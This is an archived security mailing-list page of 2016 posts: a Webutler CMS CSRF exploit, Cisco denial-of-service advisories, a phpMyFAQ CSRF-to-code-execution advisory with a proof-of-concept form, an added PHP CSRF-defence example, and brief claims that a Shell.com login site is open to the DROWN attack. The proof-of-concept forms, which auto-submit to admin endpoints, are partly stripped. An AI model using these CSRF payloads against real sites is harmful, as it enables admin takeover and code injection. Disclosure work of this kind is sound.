Webutler CMS 3.2 - Cross-Site Request Forgery

2016-04-20 Thread displaymyname
*# Exploit Title: Webutler CMS Cross-Site Request Forgery*
*# Date: 18 April 2016*
*# Exploit Author: Keerati T. (Post)*
*# Vendor Homepage: http://webutler.de/en *
*# Software Link: http://webutler.de/download/webutler_v3.2.zip *
*# Version: 3.2*
*# Tested on: Linux*
 
*1. Description*
The Webutler is a simple online page editor for static HTML files.
Webmasters can provide a simple login option for image and text editing to
their customers. The Webutler is a tool for websites or projects to be
implemented with a small effort. The project has grown over the years and
now you can do a lot of things with it.
All of the administrative functions allow any user to perform HTTP requests
without verifying the request. This exploit can be performed while the logged-on
user (administrator) visits a malicious web page that embeds an HTML form.
 
 
*2. Proof of Concept*
PoC for the change password function only, but other functions (add page,
delete page, etc.) can be exploited.
 

  
http://10.0.0.102/webutler/admin/system/save.php";
method="POST">
  
  
  
  
  
  

  
  document.forms[0].submit();

 
 
*3. Timeline*
11 Apr 2016 - Vulnerability discovered.
11 Apr 2016 - No main contact available on vendor web page. Asked the related
contact shown on the vendor web page instead.
18 Apr 2016 - No response from related contact and vulnerability disclosed.


Cisco Security Advisory: Multiple Cisco Products libSRTP Denial of Service Vulnerability

2016-04-20 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Multiple Cisco Products libSRTP Denial of Service Vulnerability

Advisory ID: cisco-sa-20160420-libsrtp

Revision 1.0

For Public Release 2016 April 20 16:00 UTC (GMT)

+-

Summary
===

Cisco released version 1.5.3 of the Secure Real-Time Transport Protocol (SRTP) 
library (libSRTP), which addresses a denial of service (DoS) vulnerability. 
Multiple Cisco products incorporate a vulnerable version of the libSRTP library.

The vulnerability is in the encryption processing subsystem of libSRTP and 
could allow an unauthenticated, remote attacker to trigger a DoS condition. The 
vulnerability is due to improper input validation of certain fields of SRTP 
packets. An attacker could exploit this vulnerability by sending a crafted SRTP 
packet designed to trigger the issue to an affected device.

The impact of this vulnerability on Cisco products may vary depending on the 
affected product. Details about the impact on each product are outlined in the 
"Conditions" section of each Cisco bug for this vulnerability. The bug IDs are 
listed at the top of this advisory and in the table in "Vulnerable Products."

This advisory is available at the following link: 

http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160420-libsrtp

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.5 (SunOS)
-END PGP SIGNATURE-


Cisco Security Advisory: Cisco Adaptive Security Appliance Software DHCPv6 Relay Denial of Service Vulnerability

2016-04-20 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Cisco Security Advisory: Cisco Adaptive Security Appliance Software DHCPv6 
Relay Denial of Service Vulnerability

Advisory ID: cisco-sa-20160420-asa-dhcpv6

Revision 1.0

For Public Release 2016 April 20 16:00  GMT (UTC)

+-

Summary
===

A vulnerability in the DHCPv6 relay feature of Cisco Adaptive Security 
Appliance (ASA) Software could allow an unauthenticated, remote attacker to 
cause an affected device to reload.

The vulnerability is due to insufficient validation of DHCPv6 packets. An 
attacker could exploit this vulnerability by sending crafted DHCPv6 packets to 
an affected device, resulting in a denial of service (DoS) condition.

This vulnerability affects systems configured in routed firewall mode and in 
single or multiple context mode. Cisco ASA Software is affected by this 
vulnerability only if the software is configured with the DHCPv6 relay feature. 
The vulnerability is triggered only by IPv6 traffic.

This vulnerability affects Cisco ASA Software release 9.4.1 only.

Cisco has released software updates that address this vulnerability. There are 
no workarounds that address this vulnerability.

This advisory is available at the following link: 
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160420-asa-dhcpv6





-BEGIN PGP SIGNATURE-
Version: GnuPG/MacGPG2 v2
Comment: GPGTools - https://gpgtools.org

-END PGP SIGNATURE-


Cisco Security Advisory: Cisco Wireless LAN Controller HTTP Parsing Denial of Service Vulnerability

2016-04-20 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Cisco Security Advisory: Cisco Wireless LAN Controller HTTP Parsing Denial of 
Service Vulnerability

Advisory ID: cisco-sa-20160420-htrd

Revision 1.0

For Public Release 2016 April 20 16:00  GMT (UTC)

+-

Summary
===

A vulnerability in the HTTP URL redirect feature of Cisco Wireless LAN 
Controller (WLC) Software could allow an unauthenticated, remote attacker to 
cause a buffer overflow condition on an affected device, resulting in a denial 
of service (DoS) condition.

The vulnerability is due to improper handling of HTTP traffic by the affected 
software. An attacker could exploit this vulnerability by sending a crafted 
HTTP request to an affected device. A successful exploit could allow the 
attacker to cause a buffer overflow condition on the device, which could allow 
the attacker to cause the device to reload, resulting in a DoS condition, or 
execute arbitrary code on the device.

Cisco has released software updates that address this vulnerability. There are 
no workarounds that address this vulnerability. 

This advisory is available at the following link: 
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160420-htrd
-BEGIN PGP SIGNATURE-
Comment: GPGTools - https://gpgtools.org
-END PGP SIGNATURE-


Cisco Security Advisory: Cisco Wireless LAN Controller Denial of Service Vulnerability

2016-04-20 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Cisco Security Advisory: Cisco Wireless LAN Controller Denial of Service 
Vulnerability

Advisory ID: cisco-sa-20160420-bdos

Revision 1.0

For Public Release 2016 April 20 16:00  GMT (UTC)

+-

Summary
===

A vulnerability in the Bonjour task manager of Cisco Wireless LAN Controller 
(WLC) Software could allow an unauthenticated, remote attacker to cause a 
denial of service (DoS) condition on an affected device.

The vulnerability is due to improper handling of Bonjour traffic by the 
affected software. An attacker could exploit this vulnerability by sending 
crafted Bonjour traffic to an affected device. A successful exploit could allow 
the attacker to cause the device to reload, resulting in a DoS condition.

Cisco has released software updates that address this vulnerability. There are 
no workarounds that address this vulnerability.

This advisory is available at the following link: 
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160420-bdos
-BEGIN PGP SIGNATURE-
Comment: GPGTools - https://gpgtools.org
-END PGP SIGNATURE-


Cisco Security Advisory: Cisco Wireless LAN Controller Management Interface Denial of Service Vulnerability

2016-04-20 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Cisco Security Advisory: Cisco Wireless LAN Controller Management Interface 
Denial of Service Vulnerability

Advisory ID: cisco-sa-20160420-wlc

Revision 1.0

For Public Release 2016 April 20 16:00  GMT (UTC)

+-

Summary
===

A vulnerability in the web-based management interface of Cisco Wireless LAN 
Controller (WLC) devices running Cisco AireOS Software could allow an 
unauthenticated, remote attacker to cause an affected device to reload, 
resulting in a denial of service (DoS) condition.

The vulnerability is due to the presence of unsupported URLs in the web-based 
device management interface provided by the affected software. An attacker 
could exploit this vulnerability by attempting to access a URL that is not 
generally accessible from and supported by the management interface. A 
successful exploit could allow the attacker to cause the device to reload, 
resulting in a DoS condition.

Cisco has released software updates that address this vulnerability. There are 
no workarounds that address this vulnerability.

This advisory is available at the following link: 
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160420-wlc
-BEGIN PGP SIGNATURE-
Comment: GPGTools - https://gpgtools.org
-END PGP SIGNATURE-


RCE via CSRF in phpMyFAQ

2016-04-20 Thread High-Tech Bridge Security Research
Advisory ID: HTB23300
Product: phpMyFAQ
Vendor: http://www.phpmyfaq.de 
Vulnerable Version(s): 2.8.26, 2.9.0-RC2 and probably prior
Tested Version: 2.8.26, 2.9.0-RC2
Advisory Publication:  March 30, 2016  [without technical details]
Vendor Notification: March 30, 2016 
Vendor Patch: April 11, 2016 
Public Disclosure: April 20, 2016 
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
Risk Level: High 
CVSSv3 Base Score: 8.8 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered a high-risk security 
vulnerability in a popular multilingual FAQ software phpMyFAQ. A remote 
attacker can execute arbitrary PHP code on vulnerable system via CSRF attack 
against website administrator and completely compromise vulnerable web 
application. 

The vulnerability exists because the application does not properly verify the 
origin of HTTP requests in the "Interface Translation" functionality. A remote 
unauthenticated attacker can create a specially crafted malicious web page with 
a CSRF exploit, trick a logged-in administrator into visiting the page, spoof the 
HTTP request as if it were coming from the legitimate user, and inject and execute 
arbitrary PHP code on the target system with the privileges of the webserver. 

A simple CSRF exploit below can be used to inject "phpinfo()" PHP function into 
file "/lang/language_af.php":


 http://[host]/admin/index.php?action=ajax&ajax=trans&ajaxaction=save_added_trans";
 method="POST" name="main">






document.main.submit();


To trigger the execution of "phpinfo()", just open the following file in your 
browser (no privileges required): 


 http://[host]/"; method="POST">







---

Solution:

Update to phpMyFAQ 2.8.27 or 2.9.0-RC3

More Information:
http://www.phpmyfaq.de/security/advisory-2016-04-11

---

References:

[1] High-Tech Bridge Advisory HTB23300 - 
https://www.htbridge.com/advisory/HTB23300 - RCE via CSRF in phpMyFAQ
[2] phpMyFAQ - http://www.phpmyfaq.de - Open Source FAQ software
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by 
High-Tech Bridge for on-demand and continuous web application security, 
vulnerability management, monitoring and PCI DSS compliance.
[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL 
implementation for PCI DSS and NIST compliance. Supports all types of protocols.

---

Disclaimer: The information provided in this Advisory is provided "as is" and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.
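
Added example, not part of the Webutler or phpMyFAQ advisories above and not code from either project: a server-side gate of the kind both reports say was missing, combining a per-session token with a check of the request's Origin. The function names, the "csrf_token" field name and the host "cms.example" are assumptions made for illustration.

```php
<?php
// Added example: names below are hypothetical, not Webutler or phpMyFAQ APIs.
declare(strict_types=1);

/** Return the per-session token, creating it on first use. */
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/** True when Origin (or, failing that, Referer) names our own host. */
function same_origin(array $server, string $expectedHost): bool
{
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    $host = parse_url($source, PHP_URL_HOST);
    // A request carrying neither header is rejected as well.
    return is_string($host) && strcasecmp($host, $expectedHost) === 0;
}

/** Gate for every state-changing admin request (password change, page delete, translation save). */
function verify_admin_request(array $server, array $post, array $session, string $expectedHost): bool
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;                    // state changes are accepted via POST only
    }
    if (!same_origin($server, $expectedHost)) {
        return false;                    // form was submitted from another site
    }
    $sent  = $post['csrf_token'] ?? '';
    $known = $session['csrf_token'] ?? '';
    // Constant-time comparison; an empty session token never matches.
    return is_string($sent) && $known !== '' && hash_equals($known, $sent);
}

// Constructed sample requests (no real hosts or sessions).
$session = [];
$token   = csrf_token($session);
$own     = ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'https://cms.example'];
$foreign = ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'https://other.example'];

var_dump(verify_admin_request($own, ['csrf_token' => $token], $session, 'cms.example'));
var_dump(verify_admin_request($foreign, ['csrf_token' => $token], $session, 'cms.example'));
var_dump(verify_admin_request($own, ['csrf_token' => 'guess'], $session, 'cms.example'));
```

The host comparison ignores scheme and port; a deployment that serves several applications from one host name would compare the full origin instead.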



shell.com vulnerable TLS

2016-04-20 Thread shell
Decrypting RSA using Obsolete and Weakened eNcryption





*.Shell.com Port 443 DROWN decryption attack

2016-04-20 Thread shell
Login: 

https://prom3.shell.com/(S(qxq1noy1f4gl4g45kbggia45))/Common/Login.aspx

Vulnerability

An attacker can decrypt traffic and get login and passwords


Signatures
